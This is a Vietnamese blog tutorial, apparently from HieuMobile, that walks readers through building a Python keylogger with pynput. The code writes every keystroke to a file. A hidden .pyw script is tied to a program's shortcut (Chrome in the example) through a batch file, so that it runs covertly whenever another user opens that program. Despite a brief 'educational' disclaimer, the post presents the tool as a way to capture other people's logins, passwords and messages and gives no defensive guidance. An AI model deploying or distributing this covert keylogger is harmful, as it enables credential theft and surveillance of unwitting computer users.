Cách tạo Keylogger để theo dõi hoạt động bàn phím máy tính

Keylogger là một trong những chương trình gián điệp giúp người tạo thu thập các dữ liệu, theo dõi hành vi sử dụng của một chiếc máy tính nào đó. Có nhiều cách tạo ra Keylogger nhưng trong bài viết này HieuMobile xin chia sẻ với các bạn cách tạo Keylogger theo dõi hoạt động bàn phím máy tính bằng ngôn ngữ lập trình Python tuy đơn giản nhưng khá nguy hiểm.

Đúng với tên gọi, khi loại Keylogger này hoạt động nó sẽ theo dõi và thu thập toàn bộ những văn bản được đánh ra trên máy tính. Tận dụng điều này kẻ tấn công có thể đánh cắp các dữ liệu của người dùng như thông tin đăng nhập (tài khoản, mật khẩu), trang web đã truy cập, tin nhắn… và nhiều thứ khác nữa.

Và với mục đích giáo dục cũng như cảnh báo an toàn thông tin, ở bài viết này mình sẽ hướng dẫn các bạn tạo ra một Keylogger đơn giản có chức năng tương tự như trên. Bạn có thể cho nó hoạt động toàn hệ thống hoặc thực hiện tấn công trên các phần mềm khác tùy theo nhu cầu như trình duyệt, game… Dưới đây là cách thực hiện, mời các bạn tham khảo.

Hướng dẫn tạo Keylogger để theo dõi hoạt động bàn phím máy tính

Bước 1: Tiến hành tải về và cài đặt phần mềm Python phiên bản mới nhất tại địa chỉ https://www.python.org/downloads/

Trong quá trình cài đặt, tại giao diện bên dưới nhớ đặt dấy tích vào dòng Add Python 3.x to PATH trước rồi mới bấm Install Now nhé.

Sau khi cài đặt thành công, mở chương trình Command Prompt ở chế độ Run as administrator sau đó dán dòng lệnh bên dưới vào và bấm Enter:

• pip install pynput

Bước 2: Mở Notepad (có sẵn trong Windows 10), dán code bên dưới vào:

• from pynput.keyboard import Listener
  def evnt_key_press(key):
  f = open(‘key.txt’,’a’)
  f.write(str(key).replace(“‘”,”) + “\n” )
  f.close()
  obj = Listener(on_press=evnt_key_press)
  obj.start()
  obj.join()

Sau đó bấm File > Save As > chọn chỗ lưu (ở đây mình sẽ chọn ổ D) > đặt tên là keylog.pyw

Bước 3: Tiếp tục khởi động lại Notepad, dán 3 dòng lệnh bên dưới và thay thế đường dẫn file keylog.pyw và phần mềm mà bạn muốn theo dõi bàn phím:

• start “” “ĐƯỜNG DẪN PHẦN MỀM”
• D:
• start “” “ĐƯỜNG DẪN FILE keylog.pyw”

Sau khi hoàn tất, bấm File > Save As > đặt tên là a.bat và lưu ở vị trí bất kỳ mà bạn muốn. (để cho tiện bạn hãy lưu chung vị trí với file keylog.pyw )

Ví dụ:

• Mình cho Keylog hoạt động khi mở phần mềm Chrome thì mình sẽ thay thế bằng đường dẫn Chrome là C:\Program Files\Google\Chrome\Application\chrome.exe . Để xem đường dẫn phần mềm bất kỳ, bạn hãy nhấp chuột phải vào biểu tượng của nó trên màn hình chính > tại tab Shortcut sao chép lại đường dẫn ở mục Target.
• D: là lệnh điều hướng truy cập ổ đĩa lưu trữ file keylog.pyw, nếu file keylog.pyw của bạn lưu ở ổ C thì thay đổi thành C:
• ĐƯỜNG DẪN FILE keylog.pyw là nơi mà bạn đã lưu trữ file keylog.pyw đã tạo lúc nãy, với mình là D:\keylog.pyw

Bước 4: Nhấp chuột phải vào biểu tượng mà bạn muốn keylogger hoạt động ở màn hình chính, tại tab Shortcut xóa tất cả đường dẫn đang có thành đường dẫn file a.bat mà bạn đã tạo lúc nãy. Sau khi hoàn tất bấm nút Apply > Continue > OK để lưu lại.

Như vậy là xong, kể từ lúc này phần mềm mà bạn muốn (ví dụ ở đây là Chrome) mỗi khi khởi động sẽ được chạy kèm với chương trình keylog mà bạn đã tạo. Khi đó tất cả nội dung nhập bằng bàn phím sẽ được lưu trữ trong một file tên là key.txt lưu cùng với vị trí file keylog.pyw . Bạn chỉ cần mở nó là có thể xem lại những nội dung mà mình hoặc một người dùng nào đó đã nhập bằng bàn phím.

Lưu ý: Keylogger sẽ tự ngừng hoạt động khi Chrome bị tắt đi.